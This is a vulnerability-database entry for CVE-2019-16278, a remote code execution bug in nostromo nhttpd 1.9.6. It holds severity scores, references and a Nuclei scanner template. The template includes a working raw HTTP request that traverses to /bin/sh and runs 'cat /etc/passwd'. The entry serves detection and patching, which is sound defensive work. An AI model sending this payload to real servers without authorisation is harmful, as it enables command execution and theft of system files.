Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2019-16278
HistorySep 01, 2020 - 3:59 p.m.

nostromo 1.9.6 - Remote Code Execution

2020-09-0115:59:30
ProjectDiscovery
github.com
5

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.7 High

AI Score

Confidence

High

0.974 High

EPSS

Percentile

99.9%

nostromo nhttpd through 1.9.6 allows an attacker to achieve remote code execution via directory traversal in the function http_verify.

id: CVE-2019-16278

info:
  name: nostromo 1.9.6 - Remote Code Execution
  author: pikpikcu
  severity: critical
  description: nostromo nhttpd through 1.9.6 allows an attacker to achieve remote code execution via  directory traversal in the function http_verify.
  impact: |
    Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the target system.
  remediation: |
    Upgrade to a patched version of nostromo web server (1.9.7 or later) or apply the vendor-supplied patch.
  reference:
    - https://packetstormsecurity.com/files/155802/nostromo-1.9.6-Remote-Code-Execution.html
    - https://www.exploit-db.com/raw/47837
    - https://nvd.nist.gov/vuln/detail/CVE-2019-16278
    - http://www.nazgul.ch/dev/nostromo_cl.txt
    - http://packetstormsecurity.com/files/155045/Nostromo-1.9.6-Directory-Traversal-Remote-Command-Execution.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2019-16278
    cwe-id: CWE-22
    epss-score: 0.97408
    epss-percentile: 0.99926
    cpe: cpe:2.3:a:nazgul:nostromo_nhttpd:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: nazgul
    product: nostromo_nhttpd
  tags: cve,cve2019,edb,rce,packetstorm,nazgul

http:
  - raw:
      - |
        POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.1
        Host: {{Hostname}}

        echo
        echo
        cat /etc/passwd 2>&1

    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"
# digest: 490a0046304402202380b19c009ef3cdcd0156d621203e553917d5ba91109cdf1694e2d725a82910022037ba291c44635675550212ffea435638f2b503ca360a6f4520960596ebccec48:922c64590222798bb761d5b6d8e72950

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.7 High

AI Score

Confidence

High

0.974 High

EPSS

Percentile

99.9%